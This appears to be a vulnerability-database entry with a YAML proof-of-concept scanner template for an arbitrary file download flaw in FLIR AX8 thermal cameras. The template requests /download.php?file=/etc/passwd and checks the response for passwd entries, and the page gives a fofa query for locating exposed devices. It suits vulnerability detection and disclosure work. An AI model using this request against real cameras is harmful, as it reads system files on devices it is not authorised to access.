flix-ax8-download-read-file: FLIR-AX8 download.php 任意文件下载

漏洞描述

PoC代码[已公开]

id: flix-ax8-download-read-file

info:
  name: FLIR-AX8 download.php 任意文件下载
  author: zan8in
  severity: high
  description: |
    FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
    fofa: app="FLIR-FLIR-AX8"
  tags: flir,ax8,download,read-file
  created: 2023/11/14

rules:
  r0:
    request:
      method: GET
      path: /download.php?file=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• POC CVE-2022-37061: FLIR AX8 1.46.16 - Remote Command Injection
• POC flir-ax8-res-php-rce: FLIR-AX8 res.php 后台命令执行漏洞
• POC FLIR-AX8热成像仪download.php存在任意文件读取漏洞
• POC FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞
• FLIR AX8 Thermal Camera 命令注入漏洞
• FLIR AX8 Thermal Camera 目录遍历漏洞
• FLIR AX8 摄像头 任意文件下载漏洞
• FLIR-AX8 /download.php 路径存在任意文件下载漏洞
• FLIR AX8 Thermal Camera存在默认账号密码漏洞
• FLIR AX8热像仪1.32.16型号RTSP流-信息泄漏
• FLIR-AX8热感摄像机download.php-任意文件下载
• FLIR AX8 Thermal Camera 1.32.16-硬编码凭证